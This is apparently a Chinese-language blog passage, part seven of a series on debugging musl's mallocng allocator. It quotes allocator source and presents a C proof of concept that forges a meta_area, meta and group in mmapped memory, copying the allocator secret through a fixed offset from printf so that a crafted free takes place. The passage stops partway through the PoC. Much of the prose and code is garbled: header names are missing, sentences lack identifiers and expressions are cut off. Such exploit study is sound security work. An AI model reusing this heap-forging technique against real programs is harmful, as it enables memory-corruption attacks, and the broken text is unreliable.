debug musl( 七 )

< 32) usage += ctx.usage_by_class[sc + 1];// try to drop to a lower count if the one found above// increases usage by more than 25%. these reduced counts// roughly fill an integral number of pages, just not a// power of two, limiting amount of unusable space.if (4 * cnt > usage && !nosmall) {if (0);else if ((sc & 3) == 1 && size * cnt > 8 * pagesize)cnt = 2;else if ((sc & 3) == 2 && size * cnt > 4 * pagesize)cnt = 3;else if ((sc & 3) == 0 && size * cnt > 8 * pagesize)cnt = 3;else if ((sc & 3) == 0 && size * cnt > 2 * pagesize)cnt = 5;}size_t needed = size * cnt + UNIT;needed += -needed & (pagesize - 1);// produce an individually-mmapped allocation if usage is low,// bounce counter hasn't triggered, and either it saves memory// or it avoids eagar slot allocation without wasting too much.if (!nosmall && cnt <= 7) {req += IB + UNIT;req += -req & (pagesize - 1);if (req < size + UNIT || (req >= 4 * pagesize && 2 * cnt > usage)) {cnt = 1;needed = req;}}p = mmap(0, needed, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANON, -1, 0);if (p == MAP_FAILED) {free_meta(m);return 0;}m->maplen = needed >> 12;ctx.mmap_counter++;active_idx = (4096 - UNIT) / size - 1;if (active_idx > cnt - 1) active_idx = cnt - 1;if (active_idx < 0) active_idx = 0;}
如果所需内存不超过页大小的一半则在再申请一个所需大小的 chunk,然后在其中构造 group。与正常申请不同的是这里直接调用获取 chunk 的下标,不过和正常申请实际是一样的 。在申请的 chunk 的头部要打上标记(p[-3] = (p[-3] & 31) | (6< 48。之后调用函数触发。
uint32_t self = 1u << i;int sc = g->sizeclass;uint32_t mask = g->freed_mask | g->avail_mask;if (mask + self == (2u << g->last_idx) - 1 && okay_to_free(g)) {// any multi-slot group is necessarily on an active list// here, but single-slot groups might or might not be.if (g->next) {assert(sc < 48);int activate_new = (ctx.active[sc] == g);dequeue(&ctx.active[sc], g);if (activate_new && ctx.active[sc])activate_group(ctx.active[sc]);}return free_group(g);}
之后进入函数后为了减小伪造难度不再调用要保证不为零 。
static struct mapinfo free_group(struct meta *g) {struct mapinfo mi = {0};int sc = g->sizeclass;if (sc < 48) {ctx.usage_by_class[sc] -= g->last_idx + 1;}if (g->maplen) {step_seq();record_seq(sc);mi.base = g->mem;mi.len = g->maplen * 4096UL;} else {void *p = g->mem;struct meta *m = get_meta(p);int idx = get_slot_index(p);g->mem->meta = 0;// not checking size/reserved here; it's intentionally invalidmi = nontrivial_free(m, idx);}free_meta(g);return mi;}
poc 如下:
#include #include #include #include #include #include #include #define UNIT 16#define IB 4#define FAKE_CHUNK_SIZE 0x80#define FAKE_CHUNK_INDEX 1#define LAST_INDEX 4const uint16_t size_classes[] = {1, 2, 3, 4, 5, 6, 7, 8,9, 10, 12, 15,18, 20, 25, 31,36, 42, 50, 63,72, 84, 102, 127,146, 170, 204, 255,292, 340, 409, 511,584, 682, 818, 1023,1169, 1364, 1637, 2047,2340, 2730, 3276, 4095,4680, 5460, 6552, 8191,};static inline int size_to_class(size_t n) {n = (n + IB - 1) >> 4;if (n < 10) return n;n++;int i = (28 - __builtin_ctz(n)) * 4 + 8;if (n > size_classes[i + 1]) i += 2;if (n > size_classes[i]) i++;return i;}struct malloc_context {uint64_t secret;int init_done;unsigned mmap_counter;struct meta *free_meta_head;struct meta *avail_meta;size_t avail_meta_count, avail_meta_area_count, meta_alloc_shift;struct meta_area *meta_area_head, *meta_area_tail;unsigned char *avail_meta_areas;struct meta *active[48];size_t usage_by_class[48];uint8_t unmap_seq[32], bounces[32];uint8_t seq;uintptr_t brk;};struct group {struct meta *meta;unsigned char active_idx: 5;char pad[UNIT - sizeof(struct meta *) - 1];unsigned char storage[];};struct meta {struct meta *prev, *next;struct group *mem;volatile int avail_mask, freed_mask;uintptr_t last_idx: 5;uintptr_t freeable: 1;uintptr_t sizeclass: 6;uintptr_t maplen: 8 * sizeof(uintptr_t) - 12;};struct meta_area {uint64_t check;struct meta_area *next;int nslots;struct meta slots[];};int main() {struct malloc_context *ctx = (struct malloc_context *) (&printf + 0x247193);struct meta target = {};void *mmap_space = mmap(NULL, 0x2000, PROT_WRITE | PROT_READ, MAP_PRIVATE | MAP_ANON, -1, 0);struct meta_area *fake_meta_area = mmap_space;fake_meta_area->check = ctx->secret;struct meta *fake_meta = (struct meta *) ((uint64_t) mmap_space + 0x100);fake_meta->maplen = 1;fake_meta->sizeclass = size_to_class(FAKE_CHUNK_SIZE - IB);fake_meta->last_idx = LAST_INDEX;fake_meta->freeable = 1;struct group *fake_group = (struct group *) ((uint64_t) mmap_space + 0x1000);fake_meta->mem = fake_group;fake_group->meta = fake_meta;fake_meta->avail_mask = ((2U